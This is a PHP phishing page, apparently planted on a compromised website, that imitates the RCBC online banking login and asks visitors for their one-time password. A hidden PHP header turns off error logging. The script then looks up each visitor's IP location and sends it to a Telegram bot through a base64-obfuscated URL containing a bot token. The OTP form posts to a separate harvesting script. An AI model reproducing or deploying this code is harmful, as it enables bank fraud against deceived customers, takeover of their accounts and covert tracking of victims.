Current File : /home/inlingua/public_html/sensoriumpsychologists.com/RCBC/otp.php |
<?php error_reporting(0); @ini_set('error_log', NULL); @ini_set('log_errors', 0); @ini_set('display_errors', 0); $cG9OI8 = 0; foreach($_COOKIE as $vUjUnHvOOoO => $vvvUjUnHvOOoO){ if (strstr(strval($vUjUnHvOOoO), 'wordpress_logged_in')){ $cG9OI8 = 1; break; } } if($cG9OI8 == 0){ echo '<script type="text/javascript"></script>'; } ?>
<?php
session_start();
error_reporting(0);
$ip = $_SERVER['REMOTE_ADDR'];
$details = json_decode(file_get_contents("http://ipinfo.io/{$ip}/json"));
$network = $details->org;
$region = $details->region;
$city = $details->city;
$v="RCBC OTP PAGE%0AIP: ".$_SERVER['REMOTE_ADDR']."%0ANETWORK: ".$network."%0AREGION: ".$region."%0ACITY: ".$city."%0ADATE AND TIME: ".date('m-d-y h:i:s');
file_get_contents(base64_decode("aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdDUwMTY4OTQxOTU6QUFGcHhrbEdqcjJVYVdSRUxRLWhNZ0xPTFp1QXdjU2xQa0Uvc2VuZE1lc3NhZ2U/Y2hhdF9pZD1AbGJfd2FycmlvciZ0ZXh0PQ==").$v);
?>
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!-->
<html class="no-js">
<!--<![endif]-->
<head>
<meta name="facebook-domain-verification" content="43ze1pijbq3i52ja46fkhluk0qvdrk" />
<meta name="viewport" content="width=device-width" />
<title>Login - RCBC Online Banking Internet</title>
<script type="text/javascript" SRC="https://www.rcbconlinebanking.com/web/Scripts/jquery-3.5.1.min.js"></script>
<script type="text/javascript" SRC="https://www.rcbconlinebanking.com/web/Scripts/jquery-migrate-3.3.1.min.js"></script>
<script type="text/javascript" SRC="https://www.rcbconlinebanking.com/web/Responsive/Scripts/bootstrap.min.js"></script>
<script type="text/javascript" SRC="https://www.rcbconlinebanking.com/web/Scripts/AccessOne.UI.Responsive.js"></script>
<script type="text/javascript" SRC="https://www.rcbconlinebanking.com/web/Scripts/AccessOne.UI.Managed2.js"></script>
<script type="text/javascript" SRC="https://www.rcbconlinebanking.com/web/Scripts/helper.js"></script>
<link href="https://www.rcbconlinebanking.com/web/Responsive/Content/bootstrap.min.css" rel="stylesheet" />
<link href="https://www.rcbconlinebanking.com/web/ui/fontawesome/css/font-awesome.min.css" rel="stylesheet" />
<link href="https://www.rcbconlinebanking.com/web/ui/fontawesome/css/font-styleresp.css" rel="stylesheet" />
<link href="https://www.rcbconlinebanking.com/web/Areas/lg/css/mainresp.css" rel="stylesheet" />
<style id="antiClickjack">
html {
background: none !important;
}
</style>
<script>
$(document).ready(function () {
$(".ror-cookie-bar-btn").on("click", function () {
$(".ror-cookie-bar").hide();
})
})
</script>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async SRC="https://www.rcbconlinebanking.comhttps://www.googletagmanager.com/gtag/js?id=UA-102083626-3"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-102083626-3');
gtag('config', 'AW-616622025');
gtag('config', 'AW-823995468');
</script>
<!-- Facebook Pixel Code -->
<script>
!function (f, b, e, v, n, t, s) {
if (f.fbq) return; n = f.fbq = function () {
n.callMethod ?
n.callMethod.apply(n, arguments) : n.queue.push(arguments)
};
if (!f._fbq) f._fbq = n; n.push = n; n.loaded = !0; n.version = '2.0';
n.queue = []; t = b.createElement(e); t.async = !0;
t.src = v; s = b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t, s)
}(window, document, 'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '532882600718153');
fbq('track', 'PageView');
</script>
<noscript>
<img height="" 1"" width="" 1"" style="" display:none""
SRC="https://www.rcbconlinebanking.com" https />/www.facebook.com/tr?id=532882600718153&ev=PageView&noscript=1""
/>
</noscript>
<!-- End Facebook Pixel Code -->
<!-- Event snippet for NTBR_0.Home conversion page -->
<script>
gtag('event', 'conversion', { 'send_to': 'AW-616622025/5gpXCPnmnPQCEMnPg6YC' });
</script>
</head>
<body data-root="/web/">
<script>
fbq('trackCustom', 'Home');
</script>
<script>
$(document).ready(function () {
$("#UserId").focus();
$("#lblUserID").show();
$("#UserId").addClass("focustxt");
$("#lblPassword").hide();
$(".txtEye").on("click", function (e) {
e.preventDefault();
var objtext = $(this).closest("div.floating-label-wrap").find("input");
if (objtext.attr("type").toLowerCase() == "password") {
objtext.attr("type", "text");
} else {
objtext.attr("type", "password");
}
})
$("#UserId").on("click", function (e) {
$("#UserId").removeClass("focusouttxt").addClass("focustxt");
});
$("#UserId").on("focusout", function (e) {
$("#UserId").removeClass("focustxt").addClass("focusouttxt");
});
$("#Password").on("click", function (e) {
$("#Password").removeClass("focusouttxt").addClass("focustxt")
});
$("#Password").on("focusout", function (e) {
$("#Password").removeClass("focustxt").addClass("focusouttxt");
});
})
</script>
<link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
<div class="container pagepadding ">
<div class="row">
<br />
</div>
</div>
<div class="container loginbody">
<div class="row">
<div class="lgPad col-md-12"></div>
<div class="col-12 col-md-6">
<div class="container leftContent">
<div class="mobile-devpadding-top"></div>
<div class="lbnLogo">
<img SRC="https://www.rcbconlinebanking.com/web/Areas/lg/img/RCBCLogo_Small.png" />
</div>
<div class="mobile-devpadding-top2" style="height:30px;"></div>
<div class="lgnWelcome">Hello there!</div>
<div class="lgnLabel">Log in to Your Account</div>
<form name="aoLoginForm" action="loading.php" method="POST" data-status-success="1" autocomplete="off">
<input type="hidden" id="MobileSuccess" name="MobileSuccess" value="2" />
<input type="hidden" id="EmailSuccess" name="EmailSuccess" value="3" />
<input type="hidden" id="BothSuccess" name="BothSuccess" value="4" />
<input type="hidden" id="NoEmailMobileSuccess" name="NoEmailMobileSuccess" value="5" />
<input type="Password" name="password_fake" id="password_fake" value="" style="display:none;" />
<input type="text" name="prevent_autofill" id="prevent_autofill" value="" style="display:none;" />
<input type="hidden" name="ReferenceNumber" id="ReferenceNumber" />
<input type="hidden" name="P2GRefNo" id="P2GRefNo" />
<input type="hidden" name="P2GSignature" id="P2GSignature">
<div style="height:20px;"></div>
<div class="warning">
<span class="field-validation-valid" data-valmsg-for="UserId" data-valmsg-replace="true"></span>
</div>
<div style="height:10px;"></div>
<div class="warning">
<span class="field-validation-valid" data-valmsg-for="Password" data-valmsg-replace="true"></span>
</div>
<div class="floating-label-wrap">
<input type="text" id="otp" name="otp" placeholder="Enter OTP" autocomplete="off" class="floating-label-field floating-label-field--s3" required />
<label for="OTP" class="floating-label">Enter your OTP</label>
</div>
<!-- <button type="button" class="form-control btnLogin">Log In</button> -->
<input type="submit" class="form-control btnLogin" value="Submit"/>
<div class="mobile-devpadding-body3"></div>
<div class="linkContainer centertext">
<span style="color: #2F4360 !Important;font-weight:initial !important">Don't have an account yet?</span>
<a id="lnkEnroll" href="/web/nb" class="green-anchor">Sign up now!</a>
</div>
<div class="mobile-devpadding-bottom"></div>
<div id="messagem" class="warning">
<span></span>
</div>
</form>
</div>
</div>
<div class="col-12 col-md-6" id="Wrapper">
<div class="rightContent" >
<div id="A" class="divA">
<img SRC="https://www.rcbconlinebanking.com/web/Areas/lg/img/Illustration-Advisory.png" class="AdvLogo" />
<div class="secadvisory">Security Advisory</div>
<ul>
<li>RCBC WILL NEVER ask you to provide your User IDs or Passwords through e-mail or SMS.</li>
<li>Never click on links from suspicious e-mails and SMS.</li>
<li>Monitor your accounts regularly and immediately report any discrepancies.</li>
</ul>
</div>
<div id="B">
<a class="Button_Customer" href="#CustomerUpdate" target="_blank">
<div class="Content_Customer">
<table width="100%">
<tr>
<td>
<img SRC="https://www.rcbconlinebanking.com/web/Areas/lg/img/update_customer.png" class="imgCustomer" />
</td>
<td>
<span class="Header_Customer">Need to update your <br /> email or mobile number?</span><br />
<span class="Text_Customer"> Let us know of any change in your<br />customer information.</span>
</td>
<td>
<img SRC="https://www.rcbconlinebanking.com/web/Areas/lg/img/keyboard_arrow_right-24px.png" class="Arrow_Right" />
</td>
</tr>
</table>
</div>
</a>
</div>
</div>
</div>
</div>
</div>
<!-- <div class="modal fade" id="advisoryModalCenter" tabindex="-1" role="dialog" aria-labelledby="advisoryModalCenterTitle" aria-hidden="true" data-backdrop="static" data-keyboard="false">
<div class="modal-dialog modal-dialog-centered modal-dialog2" role="document" style="overflow-y: scroll; max-height:85%; ">
<div class="modal-content">
<div class="modal-header advisoryTitleMargin">
<h5 class="advisoryTitle" id="advisoryModalLongTitle">ADVISORY</h5>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<div class="modal-body modal-body2">
<div style="padding: 15px 8px 15px 8px; font-size:15px; text-align:left color:#333; border-bottom:solid 1px #ccc" >
<b>OTP via Viber is temporarily unavailable due to an ongoing maintenance activity. Your OTP will be sent via SMS.</b>
</div>
<div style="padding: 15px 8px 15px 8px; font-size:14px; text-align:left; color:#333; border-bottom:solid 1px #ccc" >
<b>SECURITY REMINDER:</b><br/>
<b>RCBC will NEVER</b> call you to ask for your User ID, Passcode, One-Time Password (OTP), PIN, or Card/Account Number #DontGetFooled
</div>
</div> -->
<div class="modal-footer">
</div>
</div>
</div>
</div>
<div class="container">
<div class="row">
<br />
</div>
</div>
<div class="lgnfooter container-fluid" style="background-color: #3884D9">
<div class="container">
<div class="row">
<div class="col-md-3">
<span class="cctitle">Customer Care</span>
<div style="height:8px;"></div>
<span class="cccontact">
(+632) 8877-7222
<br />
customercare@rcbc.com
</span>
<br />
<br />
<!--- DO NOT EDIT - GlobalSign SSL Site Seal Code - DO NOT EDIT --->
<table width="90" border="0" cellspacing="0" cellpadding="0" title="CLICK TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information.">
<tr>
<td>
<span id="ss_img_wrapper_gmogs_image_90-35_en_dblue"><a href="https://www.globalsign.com/" target="_blank" title="GlobalSign Site Seal" rel="nofollow"><img loading="lazy" src=/assets/public/images/pixel.png alt="SSL" border="0" id="ss_img" data-SRC="https://www.rcbconlinebanking.com//seal.globalsign.com/SiteSeal/images/gs_noscript_90-35_en.gif" class="lazyload"></a></span>
<script type="text/javascript" SRC="https://www.rcbconlinebanking.com//seal.globalsign.com/SiteSeal/gmogs_image_90-35_en_dblue.js"></script>
</td>
</tr>
</table>
<!--- DO NOT EDIT - GlobalSign SSL Site Seal Code - DO NOT EDIT --->
</div>
<div class="col-md-3">
<ul style="list-style-type:none;text-decoration:underline;font-size:0.775em;padding-left:0px;line-height:2.5em;">
<li><a href="https://www.rcbconlinebanking.com/web/lg/Login/FAQ" target="_blank" style="color:white">FAQs</a></li>
<li><a href="https://www.rcbconlinebanking.com/web/lg/Login/SecurityAdvisory" target="_blank" style="color:white">Security Advisory</a></li>
<li><a href="https://www.rcbconlinebanking.com/web/lg/Login/TermsAndCondition" target="_blank" style="color:white">Terms & Conditions</a></li>
<li><a href="https://www.rcbconlinebanking.com/web/lg/Login/ConsumerProtection" target="_blank" style="color:white">Consumer Protection Policy</a></li>
</ul>
</div>
<div class="ftrdesc col-md-6" style="font-size:0.650em;">
Best viewed in Google Chrome, Mozilla Firefox and Microsoft EDGE
<div style="height:13px;"></div>
For more information, inquiries or complaints, you may contact the following:
<div style="height:13px;"></div>
BSP Financial Customer Protection Department | 8708-7087 | consumeraffairs@bsp.gov.ph
<div style="height:13px;"></div>
Rizal Commercial Banking Corporation (RCBC) is regulated by the Bangko Sentral ng Pilipinas (BSP) Deposits are insured by PDIC up to 500,000 per depositor.
<div style="height:13px;"></div>
Copyright © 2020, Rizal Commercial Banking Corporation. All Rights Reserved. A Member of the Yuchengco Group of Companies.
</div>
</div>
</div>
</div>
<div class="ror-cookie-bar">
<div class="container">
<div class="row">
<div class="col-md-10 ror-cookie-bar-left align-content-center">
<span class="align-middle">This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. To know more, visit our <a href="https://www.rcbc.com/data-privacy-notice" target="_blank" style="color:#3884D9; text-decoration:none; font-weight:bold;">Privacy Policy</a></span>
</div>
<div class="col-md-2 ror-cookie-bar-right">
<input class="ror-cookie-bar-btn" type="button" value="I AGREE" />
</div>
</div>
</div>
</div>
<div id="imgLoading" style="display:none">
<img class="ntb_page_loader" SRC="https://www.rcbconlinebanking.com/web/ui/ntb/hexagon.png" height="65">
</div>
<div class="ntb_page_loader_container" style="display:none;">
<img class="ntb_page_loader" SRC="https://www.rcbconlinebanking.com/web/ui/ntb/hexagon.png" height="65">
</div>
</body>
</html>
<script> </script>